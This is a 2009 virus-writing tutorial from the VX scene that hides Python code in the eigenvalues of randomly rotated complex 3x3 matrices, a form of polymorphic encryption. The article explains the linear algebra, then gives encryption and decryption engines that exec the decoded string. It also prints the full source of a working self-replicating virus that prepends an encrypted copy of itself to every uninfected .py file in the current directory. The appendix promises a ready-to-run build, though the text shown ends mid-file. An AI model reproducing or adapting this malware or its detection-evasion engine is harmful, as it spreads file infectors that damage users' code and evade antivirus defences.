************************************************************* ************************************************************* ************ *********** ************ Hiding your virus in the matrix *********** ************ by Second Part To Hell *********** ************ *********** ************************************************************* ************************************************************* Index: ****** 0) Introduction 1) The Idea 2) Basics of Linear Algebra and Numeric 2.1) Similarity Transformation 2.2) Eigenvalues, eigenvectors 2.3) Cardano/Ferro's method 3) Coding Example 3.1) Encryption Engine 3.2) Decryption Engine & Encrypted Message 4) Virus Example 5) Conclusion 6) References A) APPENDIX A.1) Three representation of 'Hello VXers!' A.2) Secret Message A.3) Ready-To-Run Virus Code 0) Introduction In this article you will read about a new kind of polymorphism provided by the eigenvalue problem. We will use some easy results from linear algebra to understand the concept, look at the encryption, decryption and chipher code, see some example and a running virus using this technique, and read about how to use that technique and how to improve it. 1) The Idea The idea uses the fact, that the eigenvalues of a given matrix A do not change under a similarity transformation B = U^(-1) * A * U, for an invertable matrix U. The eigenvalues will be identified with the virus code, by using the ascii representation of the viruscode. The virus will look like this: Encrypted Code: ***** FUNCTIONS FOR CALCULATING THE EIGENVALUES OF THE MATRIX FUNCTIONS FOR TRANSFORM EVs -> STRING M=several matrices with EV: viruscode mycode=getcode(M) exec(mycode) ***** The internal viruscode (encrypted in the matrices) looks like this: ***** FUNCTION FOR MATRIX MULTIPLICATION READ CODE + SPLIT IN 3Byte-PARTS MAKE 3x3 MATRIX with EV=ORD(Byte1),ORD(Byte2),ORD(Byte3) MAKE TRANSFORMED MATRIX B = U^(-1)* A * U SEACHFILES AND INFECT WITH MATRICES ***** 2) Basics of Linear Algebra and Numeric 2.1) Similarity Transformation A similarity transformation is a represenation of the matrix in an other basis; that can be interpretated as a (passive) rotation of the matrix: B = U^(-1) * A * U For example, A=diag(3,2,7); U = rotation arround z-axe with angular x in R3: | cos(x) sin(x) 0 | | 3 0 0 | | cos(x) -sin(x) 0 | B = | -sin(x) cos(x) 0 | * | 0 2 0 | * | sin(x) cos(x) 0 | | 0 0 1 | | 0 0 7 | | 0 0 1 | | 3c(x)^2+2s(x)^2 -c(x)*s(x) 0 | B = | -c(x)*s(x) 3s(x)^2+2c(x)^2 0 | with c(x)=cos(x) | 0 0 7 | s(x)=sin(x) B looks different as A, but still has some equivalent properties: -> same determinant -> same trace -> same characteristic polynomial -> ... -> same eigenvalue! 2.2) Eigenvalues, eigenvectors For a matrix A, the eigenvectors give the basis of the matrix representation, the eigenvalues give the stretch or compression for a transformation. A given NxN Matrix has N eigenvalues L (skalar) and N eigenvectors v (N-vectors). These values hold the following equation: A * v = L * v (A - 1*L) * v = 0 This is true, if the determinant of (A - 1*L) is 0: det(A - 1*L)=0 For a 2x2 Matrix A A = | a b | | c d | (A - 1*L) = | (a - L) b | | c (d - L) | the determinate leads to a polynom 2nd grade: (a - L)(d - L) - b*c=0 L^2 + ( -a -d )*L + (a*d - d*c) = 0 which can be easiely solved by quadratic formula. We will use complex 3x3 matrices, therefor the determinate polynom is 3rd grade. The Cardano method provides an easy algorithm for solving that equation. 2.3) Cardano/Ferro's method This method provides a solution to cubic polynoms. Good explanations can be found all over the internet (for instance here [1]), so I will just provide the results. A cubic polynom: x^3 + a*x^2 + b*x + c = 0 With the solution: x_{1,2,3} = u_{1,2,3} - p/3u_{1,2,3} - a/3 p = b - a^2/3 q = c + (2*a^3 - 9*a*b)/27 u_{1,2,3} = (-q/2 +/- sqrt(q^2/4 + p^3/27))^(1/3) x has three solutions, as the polynom is of grade 3. The different solutions come from different values of u. u is defined by the 3rd root of a complex number, therefor there are 3 solutions. 3) Coding Example I have got the idea of that polymorphism while coding a class for SU(3) matrices; the project has been written in Python, so my code was written in Python too, and so these code examples are. For this example I have only used standard librarys by Python, no external librarys like NumPy - which would already provide an eigenvalue/eigenvector calculator. 3.1) Encryption Engine The encryption engine creates an random complex 3x3 matrix mUr, and its inverse mUl, as well as an diagonal matrix mdiag. mdiag has 3 complex (= 6 real) values in the diagonal: The real part of the diagonal-entrys (=eigenvalues) are the ASCII numbers of the chipher. The imaginary part of the eigenvalues is a couter. For instance: VX! <-> 86, 88, 33. But my eigenvalue-function returns the values in a wired order, which I did not understand (NumPy does the same). As the values need a special order, I need the imaginary part for giving that order. My diagonal matrix looks like this: | 86+1j 0 0 | | 33+3j 0 0 | mdiag = | 0 88+2j 0 | or | 0 86+1j 0 | or ... | 0 0 33+3j | | 0 0 88+2j | Then the encryption engine creates a new matrix B with B = mUl * mdiag * mUr which has the same eigenvalues as mdiag, but a very different representation, as it is rotated. - - - - - - - - - - - - - - - - - [encryption_engine.py] - - - - - - - - - - - - - - - - - import random as rnd def makerandom(mtx): for n in range(9): mtx.append(rnd.uniform(-5,5)+rnd.uniform(-5,5)*1j) def multiply(M, A, B): A0,A1,A2,A3,A4,A5,A6,A7,A8=A[:] B0,B1,B2,B3,B4,B5,B6,B7,B8=B[:] M[0]=A0*B0 + A1*B3 + A2*B6 M[1]=A0*B1 + A1*B4 + A2*B7 M[2]=A0*B2 + A1*B5 + A2*B8 M[3]=A3*B0 + A4*B3 + A5*B6 M[4]=A3*B1 + A4*B4 + A5*B7 M[5]=A3*B2 + A4*B5 + A5*B8 M[6]=A6*B0 + A7*B3 + A8*B6 M[7]=A6*B1 + A7*B4 + A8*B7 M[8]=A6*B2 + A7*B5 + A8*B8 def determinate(mtx): d=mtx[0]*mtx[4]*mtx[8]+mtx[1]*mtx[5]*mtx[6]+mtx[2]*mtx[3]*mtx[7] - \ mtx[0]*mtx[5]*mtx[7]-mtx[1]*mtx[3]*mtx[8]-mtx[2]*mtx[4]*mtx[6] return(d) def inverse(mtx): det=determinate(mtx) s0,s1,s2,s3,s4,s5,s6,s7,s8=mtx[:] mtx[0]=s4*s8-s5*s7 mtx[1]=s2*s7-s1*s8 mtx[2]=s1*s5-s2*s4 mtx[3]=s5*s6-s3*s8 mtx[4]=s0*s8-s2*s6 mtx[5]=s2*s3-s0*s5 mtx[6]=s3*s7-s4*s6 mtx[7]=s1*s6-s0*s7 mtx[8]=s0*s4-s1*s3 for n in range(9): mtx[n]/=det externstr="def getstring(M):\n" externstr= ... # WHOLE DECRYPTION ENGINE mystr="Hello VXers!" enc=externstr enc+="M=[]\n" counter=int((len(mystr)+2)/3.) mystr+=" " for n in range(counter): mUr=[] makerandom(mUr) L0=ord(mystr[3*n+0]) L1=ord(mystr[3*n+1]) L2=ord(mystr[3*n+2]) mdiag=[L0+1j, 0+0j, 0+0j, 0+0j, L1+2j, 0+0j, 0+0j, 0+0j, L2+3j] mUl=[] mUl[:]=mUr[:] inverse(mUl) mY=[] mY[:]=mUl[:] mB=[] mB[:]=mUl[:] multiply(mY,mUl,mdiag) multiply(mB,mY,mUr) vircode+="M.append([" for m in range(9): enc+=str(mB[m]) enc+="," enc+="])\n" enc+="myMTXcode=getstring(M)\n" enc+="exec(myMTXcode)" f=open('encrypted.py') f.write(enc) f.close() - - - - - - - - - - - - - - - - - [encryption_engine.py] - - - - - - - - - - - - - - - - - 3.2) Decryption Engine & Encrypted Message The decryption engine calculates the eigenvalues of all given matrices in M[], sorts them by the imaginary part of the eigenvalues, compains them to a string, and EXECutes the string. It uses the algorithm explained in (2.2) and (2.3). As example we will look at the following matrix: (63.1925704486+37.492436785j),(-28.6708074068-35.2366181875j),(-46.6902296225-51.6577151605j) M = (29.8398186401+5.66596212895j),(69.6512376023+28.7600907908j),(-22.0336492677+44.2201928279j) (-34.971148787+17.088887324j),(-6.129786337-42.3441159614j),(74.1561919491-60.2525275758j),]) We need the eigenvalues, therefor we calculate a,b,c as provided by Cardano's method: a = -207 - 6j b = 13299 + 881j c = -248898 - 31278j We can get p and q now: p = -972 + 53j q = 11609 - 1007j And the three values for u: u1 = 8.923 - 15.3j u2 = 8.788 + 15.4j u3 =-17.711 - 0.1j Insert all values in the formular for x, we get: x1 = 88 + 2j x2 = 86 + 1j x3 = 33 + 3j We sort them by the imaginary part and compain them: msg = chr(86,88,33) = 'VX!' The same way the decryption works, just using more matrices for more characters to chipher. - - - - - - - - - - - - - - - - - [decryption_engine.py] - - - - - - - - - - - - - - - - - def root3(num): fak1=(-1/2.0)+((3**(1/2.))/2.0)*1j fak2=(-1/2.0)-((3**(1/2.))/2.0)*1j a=num**(1/3.0) b=a*fak1 c=a*fak2 return([a,b,c]) def getPQ(a,b,c): p = b-((a**2)/3.0) q = c + ((2*(a**3)-9*a*b)/27.0) return([p,q]) def getU(p,q): u3=-(q/2)+((q**2)/4.0 + (p**3)/27)**(1/2.0) return(root3(u3)) def getLambda(a,p,u): if u[0] == 0: L0=u[0] - a/3.0 else: L0=u[0] - p/(3.0*u[0]) - a/3.0 if u[1] == 0: L1=-a/3.0 else: L1=u[1] - p/(3.0*u[1]) - a/3.0 if u[2] == 0: L2=-a/3.0 else: L2=u[2] - p/(3.0*u[2]) - a/3.0 return(L0,L1,L2) def getABC(mtx): a=-(mtx[0]+mtx[4]+mtx[8]) b=mtx[0]*mtx[4]+mtx[0]*mtx[8]+mtx[4]*mtx[8]-mtx[5]*mtx[7]-mtx[1]*mtx[3]-mtx[2]*mtx[6] c=-mtx[0]*mtx[4]*mtx[8]+mtx[0]*mtx[5]*mtx[7]-mtx[1]*mtx[5]*mtx[6]+mtx[1]*mtx[3]*mtx[8]-mtx[2]*mtx[3]*mtx[7]+mtx[2]*mtx[4]*mtx[6] return([a,b,c]) def eigenvalues(mtx): ABC=getABC(mtx) PQ=getPQ(ABC[0],ABC[1],ABC[2]) U=getU(PQ[0],PQ[1]) L=getLambda(ABC[0],PQ[0],U) return(L) def getstring(M): str='' for c in range(len(M)): mLD=eigenvalues(M[c]) for i in range(len(mLD)+1): for n in range(len(mLD)): if round(mLD[n].imag)==i: str+=chr(int(round(mLD[n].real))) return(str) M=[] M.append([(111.683428149+2.06459252284j),(-1.10490217211+0.0344072539331j),(0.0430530540908+1.75479909755j),(-4.06723092869+2.73413363971j),(107.599271866+2.87763698926j),(-2.2482495609+6.9132040589j),(0.59557811208+0.115466142422j),(-0.69127471186-1.55945594885j),(111.717299985+1.0577704879j),]) M.append([(118.541367154+3.93823513788j),(1.16266259421+3.00081592836j),(3.76961850274+1.86798711661j),(-25.9597030301+51.2947566872j),(95.0015605504-13.3604180029j),(-12.2548443046+56.766013692j),(-64.5665226786-4.65349502375j),(5.77015944821-24.2108814397j),(51.4570722956+15.422182865j),]) M.append([(95.0916893207+1.24561178511j),(-7.31384679005-7.22713849386j),(-19.9802422285+15.1625393048j),(-4.55938178994-3.86904477337j),(104.558036099-1.690658605j),(-13.2550872642-9.51269056571j),(-8.28550792302-4.74874242958j),(-3.68768705785-5.01225605387j),(81.3502745803+6.44504681989j),]) M.append([(69.0666846907+7.74153113972j),(-19.2643084637+46.9603166139j),(21.139970505-8.67953298508j),(-23.7952908742+11.148451161j),(107.335560615+35.3261292099j),(12.1260566742-11.6069281017j),(38.8301719439+80.4069344033j),(110.722682123+9.83929122878j),(74.5977546942-37.0676603496j),]) M.append([(87.9859537783+1.76173248065j),(0.618291470925-3.51208547752j),(-1.49018075771+3.16093597101j),(0.140255772765+1.27268956483j),(90.9732250588+6.74443516021j),(-4.73290532124-4.89204043436j),(-2.71371298788+0.9490601855j),(-11.5413989295+2.0366942355j),(96.0408211628-2.50616764086j),]) M.append([(116.637007456-4.98424447257j),(-0.956809935625+7.36275422828j),(5.28173148418+11.143291707j),(-82.8913103158+71.7301867459j),(184.402432348-87.6232821155j),(20.8733032706-184.865372846j),(105.555478945+18.2709915185j),(-110.437515978+1.054278729j),(-39.0394398039+98.6075265881j),]) M.append([(48.5425894124+8.84920621968j),(-0.245656619782+17.7588566545j),(12.5809433528+15.805731952j),(0.986479005342-1.27846095227j),(33.7337006106+3.39218276823j),(1.75371755321-0.552115644868j),(-12.3470680016-1.53249573275j),(-2.78756539197-11.7388901482j),(20.723709977-6.24138898791j),]) myMTXcode=getstring(M) exec(myMTXcode) - - - - - - - - - - - - - - - - - [decryption_engine.py] - - - - - - - - - - - - - - - - - 4) Virus example This encryption technique could be used for encrypting a computer virus, too. The virus will be encrypted and executed as string myMTXcode. A good thing is, that the executed string myMTXcode can access its own data. For that reason, the virus will never need to open a file to get its own code, but just use the decrypted myMTXcode-string. The example-virus infects by prepending all uninfected *.py files in the current directory. It decrypts itself, generates a new encrypted version of itself, and infects the files. Simple concept. The decryption is the same as in (3.2) - the decrypted virus is here: - - - - - - - - - - - - - - - - - [decrypted_virus.py] - - - - - - - - - - - - - - - - - import random as rnd import os def makerandom(mtx): for n in range(9): mtx.append(rnd.uniform(-5,5)+rnd.uniform(-5,5)*1j) def multiply(M, A, B): A0,A1,A2,A3,A4,A5,A6,A7,A8=A[:] B0,B1,B2,B3,B4,B5,B6,B7,B8=B[:] M[0]=A0*B0 + A1*B3 + A2*B6 M[1]=A0*B1 + A1*B4 + A2*B7 M[2]=A0*B2 + A1*B5 + A2*B8 M[3]=A3*B0 + A4*B3 + A5*B6 M[4]=A3*B1 + A4*B4 + A5*B7 M[5]=A3*B2 + A4*B5 + A5*B8 M[6]=A6*B0 + A7*B3 + A8*B6 M[7]=A6*B1 + A7*B4 + A8*B7 M[8]=A6*B2 + A7*B5 + A8*B8 def determinate(mtx): d=mtx[0]*mtx[4]*mtx[8]+mtx[1]*mtx[5]*mtx[6]+mtx[2]*mtx[3]*mtx[7] - \ mtx[0]*mtx[5]*mtx[7]-mtx[1]*mtx[3]*mtx[8]-mtx[2]*mtx[4]*mtx[6] return(d) def inverse(mtx): det=determinate(mtx) s0,s1,s2,s3,s4,s5,s6,s7,s8=mtx[:] mtx[0]=s4*s8-s5*s7 mtx[1]=s2*s7-s1*s8 mtx[2]=s1*s5-s2*s4 mtx[3]=s5*s6-s3*s8 mtx[4]=s0*s8-s2*s6 mtx[5]=s2*s3-s0*s5 mtx[6]=s3*s7-s4*s6 mtx[7]=s1*s6-s0*s7 mtx[8]=s0*s4-s1*s3 for n in range(9): mtx[n]/=det externstr="def root3(num):\n" externstr+=" fak1=(-1/2.0)+((3**(1/2.))/2.0)*1j\n" externstr+=" fak2=(-1/2.0)-((3**(1/2.))/2.0)*1j\n" externstr+=" a=num**(1/3.0)\n" externstr+=" b=a*fak1\n" externstr+=" c=a*fak2\n" externstr+=" return([a,b,c])\n\n" externstr+="def getPQ(a,b,c):\n" externstr+=" p = b-((a**2)/3.0)\n" externstr+=" q = c + ((2*(a**3)-9*a*b)/27.0)\n" externstr+=" return([p,q])\n\n" externstr+="def getU(p,q):\n" externstr+=" u3=-(q/2)+((q**2)/4.0 + (p**3)/27)**(1/2.0)\n" externstr+=" return(root3(u3))\n\n" externstr+="def getLambda(a,p,u):\n" externstr+=" if u[0] == 0:\n" externstr+=" L0=u[0] - a/3.0\n" externstr+=" else:\n" externstr+=" L0=u[0] - p/(3.0*u[0]) - a/3.0\n\n" externstr+=" if u[1] == 0:\n" externstr+=" L1=-a/3.0\n" externstr+=" else:\n" externstr+=" L1=u[1] - p/(3.0*u[1]) - a/3.0\n\n" externstr+=" if u[2] == 0:\n" externstr+=" L2=-a/3.0\n" externstr+=" else:\n" externstr+=" L2=u[2] - p/(3.0*u[2]) - a/3.0\n\n" externstr+=" return(L0,L1,L2)\n\n" externstr+="def getABC(mtx):\n" externstr+=" a=-(mtx[0]+mtx[4]+mtx[8])\n" externstr+=" b=mtx[0]*mtx[4]+mtx[0]*mtx[8]+mtx[4]*mtx[8]-mtx[5]*mtx[7]-mtx[1]*mtx[3]-mtx[2]*mtx[6]\n" externstr+=" c=-mtx[0]*mtx[4]*mtx[8]+mtx[0]*mtx[5]*mtx[7]-mtx[1]*mtx[5]*mtx[6]+mtx[1]*mtx[3]*mtx[8]-mtx[2]*mtx[3]*mtx[7]+mtx[2]*mtx[4]*mtx[6]\n" externstr+=" return([a,b,c])\n\n" externstr+="def eigenvalues(mtx):\n" externstr+=" ABC=getABC(mtx)\n" externstr+=" PQ=getPQ(ABC[0],ABC[1],ABC[2])\n" externstr+=" U=getU(PQ[0],PQ[1])\n" externstr+=" L=getLambda(ABC[0],PQ[0],U)\n" externstr+=" return(L)\n\n" externstr+="def getstring(M):\n" externstr+=" str=''\n" externstr+=" for c in range(len(M)):\n" externstr+=" mLD=eigenvalues(M[c])\n" externstr+=" for i in range(len(mLD)+1):\n" externstr+=" for n in range(len(mLD)):\n" externstr+=" if round(mLD[n].imag)==i:\n" externstr+=" str+=chr(int(round(mLD[n].real)))\n" externstr+=" return(str)\n\n" mystr=myMTXcode vircode=externstr vircode+="M=[]\n" counter=int((len(mystr)+2)/3.) mystr+=" " for n in range(counter): mUr=[] makerandom(mUr) L0=ord(mystr[3*n+0]) L1=ord(mystr[3*n+1]) L2=ord(mystr[3*n+2]) mdiag=[L0+1j, 0+0j, 0+0j, 0+0j, L1+2j, 0+0j, 0+0j, 0+0j, L2+3j] mUl=[] mUl[:]=mUr[:] inverse(mUl) mY=[] mY[:]=mUl[:] mB=[] mB[:]=mUl[:] multiply(mY,mUl,mdiag) multiply(mB,mY,mUr) vircode+="M.append([" for m in range(9): vircode+=str(mB[m]) vircode+="," vircode+="])\n" vircode+="myMTXcode=getstring(M)\n" vircode+="exec(myMTXcode)" a=os.listdir(os.curdir) for i in range(len(a)): b=a[i].rfind(".") if len(a[i])>b+2: if a[i][b+1]+a[i][b+2]=="py": vic=open(a[i], "r") vc=vic.read() if (vc.find("getABC")==-1): vic.close() vic=open(a[i], "w") vic.write(vircode+"\n") vic.write(vc) vic.close() - - - - - - - - - - - - - - - - - [decrypted_virus.py] - - - - - - - - - - - - - - - - - For making a 1st generation of the virus, you will need an external program, which encryptes the decrypted_virus.py. There, instead of 'mystr=myMTXcode' you have to write something like: code=open("decrypted_virus.py","r") mystr=code.read() code.close() The encrypted version is very big (~300KB), so you will find the full virus code in the APPENDIX. 5) Conclusion In this article we have seen a new kind of polymorphism provided by some easy linear algebra. The example engines use complex 3x3 matrices, and have not used any external library. One could expand the engine by NxN matrices, with a random number N. As this would lead to more complicated algebraic calculations, one would be forced to use an external numeric library. Numpy[2] provides an great amount of numerical functions, also functions for eigenvalues and eigenvectors. They could be used easiely. Another expansion could be Adding Trash[3], which has already been coded by VortX; or other interal-code changing. This makes the matrices more dynamic. Of course, this technique could be used for any programming language; in the same way as provided here for any script language and in some 'more advanced' way in binary viruses. ... My dream is over for this time; I'm going back to the other side of the moon again... - - - - - - - - - - - - - - Second Part To Hell www.spth.de.vu written in July 2009 - - - - - - - - - - - - - - 6) References [1] ... http://en.wikipedia.org/wiki/Cubic_function#Cardano.27s_method. [2] ... NumPy Website; (http://numpy.scipy.org/). [3] ... VortX; "Python Virus Writing Tutorial"; 2005; (http://vx.netlux.org/lib/vvx00.html). A) APPENDIX Here I will provide some source codes, which are too big for the article itself. There will be one encrypted messages, in three different matrix representation; one secret message and the full ready-to-run version of the example virus. Enjoy it! A.1) Three representation of 'Hello VXers!' - - - - - - - - - - - - - - - [HelloVXers.py] - - - - - - - - - - - - - - - def root3(num): fak1=(-1/2.0)+((3**(1/2.))/2.0)*1j fak2=(-1/2.0)-((3**(1/2.))/2.0)*1j a=num**(1/3.0) b=a*fak1 c=a*fak2 return([a,b,c]) def getPQ(a,b,c): p = b-((a**2)/3.0) q = c + ((2*(a**3)-9*a*b)/27.0) return([p,q]) def getU(p,q): u3=-(q/2)+((q**2)/4.0 + (p**3)/27)**(1/2.0) return(root3(u3)) def getLambda(a,p,u): if u[0] == 0: L0=u[0] - a/3.0 else: L0=u[0] - p/(3.0*u[0]) - a/3.0 if u[1] == 0: L1=-a/3.0 else: L1=u[1] - p/(3.0*u[1]) - a/3.0 if u[2] == 0: L2=-a/3.0 else: L2=u[2] - p/(3.0*u[2]) - a/3.0 return(L0,L1,L2) def getABC(mtx): a=-(mtx[0]+mtx[4]+mtx[8]) b=mtx[0]*mtx[4]+mtx[0]*mtx[8]+mtx[4]*mtx[8]-mtx[5]*mtx[7]-mtx[1]*mtx[3]-mtx[2]*mtx[6] c=-mtx[0]*mtx[4]*mtx[8]+mtx[0]*mtx[5]*mtx[7]-mtx[1]*mtx[5]*mtx[6]+mtx[1]*mtx[3]*mtx[8]-mtx[2]*mtx[3]*mtx[7]+mtx[2]*mtx[4]*mtx[6] return([a,b,c]) def eigenvalues(mtx): ABC=getABC(mtx) PQ=getPQ(ABC[0],ABC[1],ABC[2]) U=getU(PQ[0],PQ[1]) L=getLambda(ABC[0],PQ[0],U) return(L) def getstring(M): str='' for c in range(len(M)): mLD=eigenvalues(M[c]) for i in range(len(mLD)+1): for n in range(len(mLD)): if round(mLD[n].imag)==i: str+=chr(int(round(mLD[n].real))) return(str) M=[] # --- # 1st representation M.append([(105.084686903-71.4075535232j),(-27.2776206668+38.3547869867j),(32.0895820732-35.9922608683j),(120.034749958+68.7140274467j),(83.8012039916-82.7506303234j),(21.8385341617+90.0088728458j),(105.306818754+236.630372459j),(49.2360717863-160.067610161j),(47.114109105+160.158183847j),]) M.append([(104.687185112+1.80663647687j),(0.928227087536+2.52866580124j),(2.79874226919-10.9619308795j),(-1.19934240239-1.27278093269j),(111.407710857+0.634036230694j),(-0.875760297577-2.69010253347j),(-0.363507277999-0.368704422949j),(-2.67066323515+1.91389156634j),(114.905104032+3.55932729244j),]) M.append([(64.3351185223-13.0465058563j),(11.0688009548+1.80230350287j),(-31.8832639177-19.7991657784j),(15.6314242454-5.67048167663j),(73.9063304788+4.88387814038j),(5.2015637964-0.601593030787j),(-21.8832750274+14.1070904865j),(-6.5089214063-6.34987315939j),(73.7585509988+14.1626277159j),]) M.append([(107.510450228+3.81365994193j),(0.379212071564+0.259877321726j),(0.60474588221-0.786126131577j),(7.43414364538-0.404844093468j),(108.412933024-0.437341589943j),(-2.34751091361-1.243637148j),(-8.87701168231+2.16792720808j),(-0.117755406208+3.08363986493j),(111.076616748+2.62368164802j),]) M.append([(67.9546134389-26.7461871066j),(-12.8287374318-36.3449754978j),(32.8966100647-29.8785567436j),(-14.3842551082+11.2933895577j),(66.7629825998+11.2061873386j),(-14.8986001352-14.6601108182j),(13.6500611687+15.5292401489j),(11.2548841042+21.0749667041j),(71.2824039614+21.539999768j),]) M.append([(111.429643398+1.2583984545j),(2.19665511084+0.266006193096j),(-1.70898621054-2.02473298873j),(32.8718323412-0.87984924666j),(83.5764250155+3.20874806032j),(26.9515906666+27.9219936175j),(10.5920191953-13.4801438625j),(-10.3137673578+12.5504165741j),(134.993931587+1.53285348517j),]) M.append([(37.233506098+21.9382934257j),(-16.0233889842-15.4961026859j),(23.0693371785-10.0422762893j),(-9.53575553258-2.15607666899j),(43.7266731536-3.19629937338j),(0.311299045025+11.4431462923j),(12.9441811769-5.49219257014j),(-9.25193046505+12.0269967201j),(23.0398207484-12.7419940523j),]) # --- # 2nd representation M.append([(233.477766014-143.766273077j),(-392.798532662-261.841036072j),(-362.1241903-52.8905619932j),(-12.7824434335-151.89561973j),(-262.55298713+72.2102286693j),(-239.453148022+175.131002487j),(-75.5360984342+47.7987399511j),(137.881590087+172.483423282j),(265.075221115+77.5560444076j),]) M.append([(107.629288453+9.82398722899j),(4.69550589608+2.93895720325j),(5.77588156109-0.341806415739j),(28.8813319209+18.8171168603j),(125.504090088-10.438703649j),(5.47493622154-22.141130844j),(-0.177328452376-19.9216431779j),(-10.643619452-2.83161528603j),(97.8666214595+6.61471641996j),]) M.append([(65.2258145255-0.659769607648j),(2.73550192845-5.42272915859j),(1.66456570554+11.8442272718j),(-32.3796034187+15.5147254085j),(82.3118870278-0.101389292362j),(37.901607677-2.67374117246j),(-14.2726661229-7.26223490385j),(21.375102794+3.21363653612j),(64.4622984467+6.76115890001j),]) M.append([(108.024563998+1.05564611282j),(-0.334454143773-0.53120003719j),(-0.93011914702-2.20642344221j),(0.28686070564-0.889027785168j),(109.593924165+2.71863626663j),(2.07490474469-0.651870364092j),(-0.179759314279-0.50746669813j),(1.47030958102+0.728118632967j),(109.381511837+2.22571762055j),]) M.append([(71.9161924026-22.6588705928j),(39.1506993254+47.8949168423j),(-1.44582805841+35.4729601017j),(6.42626352992-8.62941188512j),(74.7637380799+18.6917220391j),(-9.92526079027+3.32948278389j),(17.1537474645-17.8326357691j),(-28.0171952477+40.5135411386j),(59.3200695174+9.9671485537j),]) M.append([(125.089618999-4.70137516017j),(-8.22036077195+12.5515389748j),(-0.851202096455+10.7798292716j),(18.073009476+5.42287358916j),(90.7239857175+5.5275098765j),(-12.0426446131+13.1839280089j),(-0.489802913746-2.12373360852j),(0.43611330554+1.22174597671j),(114.186395284+5.17386528367j),]) M.append([(35.7031876949+0.831938989908j),(-5.18292940895+0.269378383694j),(1.06257301348-1.38197036949j),(-2.7004355467+0.0819188382112j),(34.0469727026+5.70186957552j),(-0.82098809473-1.46604492889j),(4.64570678238-1.21374606357j),(-7.1068634735+0.132101380497j),(34.2498396025-0.533808565424j),]) # --- # 3rd representation M.append([(32.7224989484+2.10868288227j),(28.0318592653-15.3855851571j),(54.6843954037+10.9753849593j),(37.1011605845+6.04633871111j),(100.255120948+6.70156504485j),(-24.7407917657-10.6672701692j),(13.2146788894+5.3857952588j),(-7.31403851836-0.339836418941j),(103.022380103-2.81024792711j),]) M.append([(112.98148893+0.435182113006j),(-2.57400392505+2.27626670078j),(0.914639789692+4.65013327047j),(0.688520534281-5.79055621456j),(107.812001185+4.68838959844j),(2.21815861724+2.89805790215j),(2.19742221039-2.36385296412j),(0.0179424648799-1.26262030673j),(110.206509885+0.876428288553j),]) M.append([(20.311450638+44.9518994397j),(-2.96500024477-50.0363987396j),(-47.4136445362+42.728189374j),(-59.9154947853+56.8195980579j),(69.6638620464-38.2697273638j),(-33.3500125971+69.7931524608j),(43.022569796+25.3159908195j),(-14.5396835067+3.9114732561j),(122.024687316-0.682172075957j),]) M.append([(109.989650575+0.243745867683j),(-1.24515715016-4.28842744139j),(2.86538336588+1.61954090714j),(-0.0614756855019+1.43008393359j),(110.020880408+3.32689368099j),(-1.27431063956+0.89212917661j),(0.332965627499+1.2965493477j),(2.44225074714+0.525303374159j),(106.989469018+2.42936045132j),]) M.append([(74.2650595185-15.9097449036j),(30.0954367745-14.6678255646j),(9.01194367232+6.88151483043j),(21.5535763646+25.9163731367j),(44.5285235804+28.4719155277j),(-13.2467918849-10.6685496724j),(-4.57182407125+17.0659559076j),(-23.0310218538-9.21919427062j),(87.2064169011-6.56217062411j),]) M.append([(114.556843429+3.06190955011j),(-0.523028606873-0.992803587163j),(1.07376413569-0.245854022293j),(9.17079106879-1.82682260547j),(106.386713325+4.25476400104j),(2.04371144507-9.87558608857j),(1.96417111092-6.42790358025j),(-1.73309561938+6.16408640485j),(109.056443246-1.31667355116j),]) M.append([(35.8040604826+1.72435572145j),(0.902944017281+0.314445111326j),(-3.05627222174+0.791323266445j),(-3.41808256335+1.06421522745j),(31.478099457-0.337103513389j),(1.90867194941+3.83550794426j),(-4.24439160566+0.072942762223j),(-1.82082568751-1.47663486675j),(36.7178400604+4.61274779194j),]) # --- myMTXcode=getstring(M) exec(myMTXcode) - - - - - - - - - - - - - - - [HelloVXers.py] - - - - - - - - - - - - - - - A.2) Secret Message - - - - - - - - - - - - - - - [SecretMsg.py] - - - - - - - - - - - - - - - - def root3(num): fak1=(-1/2.0)+((3**(1/2.))/2.0)*1j fak2=(-1/2.0)-((3**(1/2.))/2.0)*1j a=num**(1/3.0) b=a*fak1 c=a*fak2 return([a,b,c]) def getPQ(a,b,c): p = b-((a**2)/3.0) q = c + ((2*(a**3)-9*a*b)/27.0) return([p,q]) def getU(p,q): u3=-(q/2)+((q**2)/4.0 + (p**3)/27)**(1/2.0) return(root3(u3)) def getLambda(a,p,u): if u[0] == 0: L0=u[0] - a/3.0 else: L0=u[0] - p/(3.0*u[0]) - a/3.0 if u[1] == 0: L1=-a/3.0 else: L1=u[1] - p/(3.0*u[1]) - a/3.0 if u[2] == 0: L2=-a/3.0 else: L2=u[2] - p/(3.0*u[2]) - a/3.0 return(L0,L1,L2) def getABC(mtx): a=-(mtx[0]+mtx[4]+mtx[8]) b=mtx[0]*mtx[4]+mtx[0]*mtx[8]+mtx[4]*mtx[8]-mtx[5]*mtx[7]-mtx[1]*mtx[3]-mtx[2]*mtx[6] c=-mtx[0]*mtx[4]*mtx[8]+mtx[0]*mtx[5]*mtx[7]-mtx[1]*mtx[5]*mtx[6]+mtx[1]*mtx[3]*mtx[8]-mtx[2]*mtx[3]*mtx[7]+mtx[2]*mtx[4]*mtx[6] return([a,b,c]) def eigenvalues(mtx): ABC=getABC(mtx) PQ=getPQ(ABC[0],ABC[1],ABC[2]) U=getU(PQ[0],PQ[1]) L=getLambda(ABC[0],PQ[0],U) return(L) def getstring(M): str='' for c in range(len(M)): mLD=eigenvalues(M[c]) for i in range(len(mLD)+1): for n in range(len(mLD)): if round(mLD[n].imag)==i: str+=chr(int(round(mLD[n].real))) return(str) M=[] M.append([(113.01385812+5.43930508534j),(1.00380746157-8.31965051919j),(0.801104731078+0.936588237838j),(3.54083344964+0.95424311335j),(108.978932614-0.625324609788j),(0.972664728193+3.21561313492j),(-1.96068431273+4.58178510931j),(3.38000675384-5.19874167231j),(109.007209265+1.18601952445j),]) M.append([(63.0988642714+6.73474244088j),(38.7957438546+7.29183564711j),(34.4164174161-43.9985000655j),(-3.42189631605-2.2839106126j),(113.592704397+4.68789276089j),(3.78797602794+2.84593141297j),(11.8086451552+20.4309988015j),(-3.08750519397-21.3451644199j),(88.308431332-5.42263520176j),]) M.append([(104.406855517-9.51624929923j),(0.968098716657+10.247486874j),(-10.7284625243-8.95847099578j),(12.9139324019-13.3095003388j),(96.7571541203+10.1186269916j),(7.53204087547-16.3313451185j),(-9.47853339226+0.528078467428j),(6.9494984576+1.54492254096j),(101.835990363+5.39762230766j),]) 